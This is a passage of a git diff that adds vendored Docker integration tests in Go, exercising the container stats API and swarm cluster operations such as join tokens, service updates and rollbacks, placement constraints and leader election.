%s", expRxPkts, postRxPackets, pingouts)) +} + +func (s *DockerSuite) TestAPIStatsNetworkStatsVersioning(c *check.C) { + // Windows doesn't support API versions less than 1.25, so no point testing 1.17 .. 
1.21 + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := runSleepingContainer(c) + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + wg := sync.WaitGroup{} + + for i := 17; i <= 21; i++ { + wg.Add(1) + go func(i int) { + defer wg.Done() + apiVersion := fmt.Sprintf("v1.%d", i) + statsJSONBlob := getVersionedStats(c, id, apiVersion) + if versions.LessThan(apiVersion, "v1.21") { + c.Assert(jsonBlobHasLTv121NetworkStats(statsJSONBlob), checker.Equals, true, + check.Commentf("Stats JSON blob from API %s %#v does not look like a =v1.21 API stats structure", apiVersion, statsJSONBlob)) + } + }(i) + } + wg.Wait() +} + +func getNetworkStats(c *check.C, id string) map[string]types.NetworkStats { + var st *types.StatsJSON + + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + c.Assert(err, checker.IsNil) + + err = json.NewDecoder(body).Decode(&st) + c.Assert(err, checker.IsNil) + body.Close() + + return st.Networks +} + +// getVersionedStats returns stats result for the +// container with id using an API call with version apiVersion. Since the +// stats result type differs between API versions, we simply return +// map[string]interface{}. 
+func getVersionedStats(c *check.C, id string, apiVersion string) map[string]interface{} { + stats := make(map[string]interface{}) + + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/%s/containers/%s/stats?stream=false", apiVersion, id), nil, "") + c.Assert(err, checker.IsNil) + defer body.Close() + + err = json.NewDecoder(body).Decode(&stats) + c.Assert(err, checker.IsNil, check.Commentf("failed to decode stat: %s", err)) + + return stats +} + +func jsonBlobHasLTv121NetworkStats(blob map[string]interface{}) bool { + networkStatsIntfc, ok := blob["network"] + if !ok { + return false + } + networkStats, ok := networkStatsIntfc.(map[string]interface{}) + if !ok { + return false + } + for _, expectedKey := range expectedNetworkInterfaceStats { + if _, ok := networkStats[expectedKey]; !ok { + return false + } + } + return true +} + +func jsonBlobHasGTE121NetworkStats(blob map[string]interface{}) bool { + networksStatsIntfc, ok := blob["networks"] + if !ok { + return false + } + networksStats, ok := networksStatsIntfc.(map[string]interface{}) + if !ok { + return false + } + for _, networkInterfaceStatsIntfc := range networksStats { + networkInterfaceStats, ok := networkInterfaceStatsIntfc.(map[string]interface{}) + if !ok { + return false + } + for _, expectedKey := range expectedNetworkInterfaceStats { + if _, ok := networkInterfaceStats[expectedKey]; !ok { + return false + } + } + } + return true +} + +func (s *DockerSuite) TestAPIStatsContainerNotFound(c *check.C) { + testRequires(c, DaemonIsLinux) + + status, _, err := sockRequest("GET", "/containers/nonexistent/stats", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) + + status, _, err = sockRequest("GET", "/containers/nonexistent/stats?stream=0", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) +} + +func (s *DockerSuite) TestAPIStatsNoStreamConnectedContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + + out1, _ := 
runSleepingContainer(c) + id1 := strings.TrimSpace(out1) + c.Assert(waitRun(id1), checker.IsNil) + + out2, _ := runSleepingContainer(c, "--net", "container:"+id1) + id2 := strings.TrimSpace(out2) + c.Assert(waitRun(id2), checker.IsNil) + + ch := make(chan error) + go func() { + resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id2), nil, "") + defer body.Close() + if err != nil { + ch <- err + } + if resp.StatusCode != http.StatusOK { + ch <- fmt.Errorf("Invalid StatusCode %v", resp.StatusCode) + } + if resp.Header.Get("Content-Type") != "application/json" { + ch <- fmt.Errorf("Invalid 'Content-Type' %v", resp.Header.Get("Content-Type")) + } + var v *types.Stats + if err := json.NewDecoder(body).Decode(&v); err != nil { + ch <- err + } + ch <- nil + }() + + select { + case err := <-ch: + c.Assert(err, checker.IsNil, check.Commentf("Error in stats Engine API: %v", err)) + case <-time.After(15 * time.Second): + c.Fatalf("Stats did not return after timeout") + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go new file mode 100644 index 0000000000..0995ce3833 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go @@ -0,0 +1,41 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "net/http" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPIStatsContainerGetMemoryLimit(c *check.C) { + testRequires(c, DaemonIsLinux, memoryLimitSupport) + + resp, body, err := sockRequestRaw("GET", "/info", nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + var info types.Info + err = json.NewDecoder(body).Decode(&info) + c.Assert(err, checker.IsNil) + body.Close() + + // don't set a 
memory limit, the memory limit should be system memory + conName := "foo" + dockerCmd(c, "run", "-d", "--name", conName, "busybox", "top") + c.Assert(waitRun(conName), checker.IsNil) + + resp, body, err = sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", conName), nil, "") + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") + + var v *types.Stats + err = json.NewDecoder(body).Decode(&v) + c.Assert(err, checker.IsNil) + body.Close() + c.Assert(fmt.Sprintf("%d", v.MemoryStats.Limit), checker.Equals, fmt.Sprintf("%d", info.MemTotal)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go new file mode 100644 index 0000000000..1f8eaec6de --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go @@ -0,0 +1,1367 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "net/http" + "os" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +var defaultReconciliationTimeout = 30 * time.Second + +func (s *DockerSwarmSuite) TestAPISwarmInit(c *check.C) { + // todo: should find a better way to verify that components are running than /info + d1 := s.AddDaemon(c, true, true) + info, err := d1.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.True) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + d2 := s.AddDaemon(c, true, false) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + // Leaving cluster + 
c.Assert(d2.Leave(false), checker.IsNil) + + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + c.Assert(d2.Join(swarm.JoinRequest{JoinToken: d1.joinTokens(c).Worker, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + // Current state restoring after restarts + err = d1.Stop() + c.Assert(err, checker.IsNil) + err = d2.Stop() + c.Assert(err, checker.IsNil) + + err = d1.Start() + c.Assert(err, checker.IsNil) + err = d2.Start() + c.Assert(err, checker.IsNil) + + info, err = d1.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.True) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) +} + +func (s *DockerSwarmSuite) TestAPISwarmJoinToken(c *check.C) { + d1 := s.AddDaemon(c, false, false) + c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil) + + d2 := s.AddDaemon(c, false, false) + err := d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "join token is necessary") + info, err := d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + err = d2.Join(swarm.JoinRequest{JoinToken: "foobaz", RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "join token is necessary") + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + 
workerToken := d1.joinTokens(c).Worker + + c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(d2.Leave(false), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + // change tokens + d1.rotateTokens(c) + + err = d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "join token is necessary") + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + workerToken = d1.joinTokens(c).Worker + + c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(d2.Leave(false), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + // change spec, don't change tokens + d1.updateSwarm(c, func(s *swarm.Spec) {}) + + err = d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "join token is necessary") + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(d2.Leave(false), checker.IsNil) + info, 
err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) +} + +func (s *DockerSwarmSuite) TestAPISwarmCAHash(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, false, false) + splitToken := strings.Split(d1.joinTokens(c).Worker, "-") + splitToken[2] = "1kxftv4ofnc6mt30lmgipg6ngf9luhwqopfk1tz6bdmnkubg0e" + replacementToken := strings.Join(splitToken, "-") + err := d2.Join(swarm.JoinRequest{JoinToken: replacementToken, RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "remote CA does not match fingerprint") +} + +func (s *DockerSwarmSuite) TestAPISwarmPromoteDemote(c *check.C) { + d1 := s.AddDaemon(c, false, false) + c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil) + d2 := s.AddDaemon(c, true, false) + + info, err := d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Role = swarm.NodeRoleManager + }) + + waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True) + + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Role = swarm.NodeRoleWorker + }) + + waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.False) + + // Demoting last node should fail + node := d1.getNode(c, d1.NodeID) + node.Spec.Role = swarm.NodeRoleWorker + url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index) + status, out, err := d1.SockRequest("POST", url, node.Spec) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("output: %q", string(out))) + c.Assert(string(out), checker.Contains, "last manager of the swarm") + info, err = d1.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, 
swarm.LocalNodeStateActive) + c.Assert(info.ControlAvailable, checker.True) + + // Promote already demoted node + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Role = swarm.NodeRoleManager + }) + + waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesEmptyList(c *check.C) { + d := s.AddDaemon(c, true, true) + + services := d.listServices(c) + c.Assert(services, checker.NotNil) + c.Assert(len(services), checker.Equals, 0, check.Commentf("services: %#v", services)) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + id := d.createService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + + service := d.getService(c, id) + instances = 5 + d.updateService(c, service, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + + d.removeService(c, service.ID) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesMultipleAgents(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks + + instances := 9 + id := d1.createService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.GreaterThan, 0) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, 
d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + // reconciliation on d2 node down + c.Assert(d2.Stop(), checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + // test downscaling + instances = 5 + d1.updateService(c, d1.getService(c, id), setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesCreateGlobal(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + d1.createService(c, simpleTestService, setGlobalMode) + + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.Equals, 1) + + d4 := s.AddDaemon(c, true, false) + d5 := s.AddDaemon(c, true, false) + + waitAndAssert(c, defaultReconciliationTimeout, d4.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d5.checkActiveContainerCount, checker.Equals, 1) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesUpdate(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*SwarmDaemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "busybox:test" + + // create a different tag + for _, d := range daemons { + out, err := d.Cmd("tag", image1, image2) + c.Assert(err, 
checker.IsNil, check.Commentf(out)) + } + + // create service + instances := 5 + parallelism := 2 + id := daemons[0].createService(c, serviceForUpdate, setInstances(instances)) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := daemons[0].getService(c, id) + daemons[0].updateService(c, service, setImage(image2)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - parallelism, image2: parallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) + + // 3nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances}) + + // Roll back to the previous version. This uses the CLI because + // rollback is a client-side operation. 
+ out, err := daemons[0].Cmd("service", "update", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances - parallelism, image1: parallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances - 2*parallelism, image1: 2 * parallelism}) + + // 3nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesFailedUpdate(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*SwarmDaemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "busybox:badtag" + + // create service + instances := 5 + id := daemons[0].createService(c, serviceForUpdate, setInstances(instances)) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := daemons[0].getService(c, id) + daemons[0].updateService(c, service, setImage(image2), setFailureAction(swarm.UpdateFailureActionPause), setMaxFailureRatio(0.25), setParallelism(1)) + + // should update 2 tasks and then pause + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceUpdateState(id), checker.Equals, swarm.UpdateStatePaused) + v, _ := daemons[0].checkServiceRunningTasks(id)(c) + c.Assert(v, checker.Equals, instances-2) + + // Roll back to the previous version. 
This uses the CLI because + // rollback is a client-side operation. + out, err := daemons[0].Cmd("service", "update", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintRole(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*SwarmDaemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) + + // create service + constraints := []string{"node.role==worker"} + instances := 3 + id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + // validate tasks are running on worker nodes + tasks := daemons[0].getServiceTasks(c, id) + for _, task := range tasks { + node := daemons[0].getNode(c, task.NodeID) + c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleWorker) + } + //remove service + daemons[0].removeService(c, id) + + // create service + constraints = []string{"node.role!=worker"} + id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].getServiceTasks(c, id) + // validate tasks are running on manager nodes + for _, task := range tasks { + node := daemons[0].getNode(c, task.NodeID) + c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleManager) + } + //remove service + daemons[0].removeService(c, id) + + // create service + constraints = []string{"node.role==nosuchrole"} + id = 
daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + // validate tasks are not assigned to any node + tasks = daemons[0].getServiceTasks(c, id) + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } +} + +func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintLabel(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*SwarmDaemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) + nodes := daemons[0].listNodes(c) + c.Assert(len(nodes), checker.Equals, nodeCount) + + // add labels to nodes + daemons[0].updateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "high", + } + }) + for i := 1; i < nodeCount; i++ { + daemons[0].updateNode(c, nodes[i].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "low", + } + }) + } + + // create service + instances := 3 + constraints := []string{"node.labels.security==high"} + id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + tasks := daemons[0].getServiceTasks(c, id) + // validate all tasks are running on nodes[0] + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, nodes[0].ID) + } + //remove service + daemons[0].removeService(c, id) + + // create service + constraints = []string{"node.labels.security!=high"} + id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), 
setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].getServiceTasks(c, id) + // validate all tasks are NOT running on nodes[0] + for _, task := range tasks { + c.Assert(task.NodeID, checker.Not(checker.Equals), nodes[0].ID) + } + //remove service + daemons[0].removeService(c, id) + + constraints = []string{"node.labels.security==medium"} + id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + tasks = daemons[0].getServiceTasks(c, id) + // validate tasks are not assigned + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } + //remove service + daemons[0].removeService(c, id) + + // multiple constraints + constraints = []string{ + "node.labels.security==high", + fmt.Sprintf("node.id==%s", nodes[1].ID), + } + id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + tasks = daemons[0].getServiceTasks(c, id) + // validate tasks are not assigned + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } + // make nodes[1] fulfills the constraints + daemons[0].updateNode(c, nodes[1].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "high", + } + }) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].getServiceTasks(c, id) + for _, task := range tasks { 
+ c.Assert(task.NodeID, checker.Equals, nodes[1].ID) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesStateReporting(c *check.C) { + testRequires(c, SameHostDaemon) + testRequires(c, DaemonIsLinux) + + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept + + instances := 9 + d1.createService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + getContainers := func() map[string]*SwarmDaemon { + m := make(map[string]*SwarmDaemon) + for _, d := range []*SwarmDaemon{d1, d2, d3} { + for _, id := range d.activeContainers() { + m[id] = d + } + } + return m + } + + containers := getContainers() + c.Assert(containers, checker.HasLen, instances) + var toRemove string + for i := range containers { + toRemove = i + } + + _, err := containers[toRemove].Cmd("stop", toRemove) + c.Assert(err, checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + containers2 := getContainers() + c.Assert(containers2, checker.HasLen, instances) + for i := range containers { + if i == toRemove { + c.Assert(containers2[i], checker.IsNil) + } else { + c.Assert(containers2[i], checker.NotNil) + } + } + + containers = containers2 + for i := range containers { + toRemove = i + } + + // try with killing process outside of docker + pidStr, err := containers[toRemove].Cmd("inspect", "-f", "{{.State.Pid}}", toRemove) + c.Assert(err, checker.IsNil) + pid, err := strconv.Atoi(strings.TrimSpace(pidStr)) + c.Assert(err, checker.IsNil) + c.Assert(syscall.Kill(pid, syscall.SIGKILL), checker.IsNil) + + time.Sleep(time.Second) // 
give some time to handle the signal + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + containers2 = getContainers() + c.Assert(containers2, checker.HasLen, instances) + for i := range containers { + if i == toRemove { + c.Assert(containers2[i], checker.IsNil) + } else { + c.Assert(containers2[i], checker.NotNil) + } + } +} + +func (s *DockerSwarmSuite) TestAPISwarmLeaderProxy(c *check.C) { + // add three managers, one of these is leader + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + // start a service by hitting each of the 3 managers + d1.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "test1" + }) + d2.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "test2" + }) + d3.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "test3" + }) + + // 3 services should be started now, because the requests were proxied to leader + // query each node and make sure it returns 3 services + for _, d := range []*SwarmDaemon{d1, d2, d3} { + services := d.listServices(c) + c.Assert(services, checker.HasLen, 3) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { + // Create 3 nodes + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + // assert that the first node we made is the leader, and the other two are followers + c.Assert(d1.getNode(c, d1.NodeID).ManagerStatus.Leader, checker.True) + c.Assert(d1.getNode(c, d2.NodeID).ManagerStatus.Leader, checker.False) + c.Assert(d1.getNode(c, d3.NodeID).ManagerStatus.Leader, checker.False) + + d1.Stop() // stop the leader + + var ( + leader *SwarmDaemon // keep track of leader + followers []*SwarmDaemon // keep track of followers + ) + checkLeader := func(nodes 
...*SwarmDaemon) checkF { + return func(c *check.C) (interface{}, check.CommentInterface) { + // clear these out before each run + leader = nil + followers = nil + for _, d := range nodes { + if d.getNode(c, d.NodeID).ManagerStatus.Leader { + leader = d + } else { + followers = append(followers, d) + } + } + + if leader == nil { + return false, check.Commentf("no leader elected") + } + + return true, check.Commentf("elected %v", leader.id) + } + } + + // wait for an election to occur + waitAndAssert(c, defaultReconciliationTimeout, checkLeader(d2, d3), checker.True) + + // assert that we have a new leader + c.Assert(leader, checker.NotNil) + + // Keep track of the current leader, since we want that to be chosen. + stableleader := leader + + // add the d1, the initial leader, back + d1.Start() + + // TODO(stevvooe): may need to wait for rejoin here + + // wait for possible election + waitAndAssert(c, defaultReconciliationTimeout, checkLeader(d1, d2, d3), checker.True) + // pick out the leader and the followers again + + // verify that we still only have 1 leader and 2 followers + c.Assert(leader, checker.NotNil) + c.Assert(followers, checker.HasLen, 2) + // and that after we added d1 back, the leader hasn't changed + c.Assert(leader.NodeID, checker.Equals, stableleader.NodeID) +} + +func (s *DockerSwarmSuite) TestAPISwarmRaftQuorum(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + d1.createService(c, simpleTestService) + + c.Assert(d2.Stop(), checker.IsNil) + + // make sure there is a leader + waitAndAssert(c, defaultReconciliationTimeout, 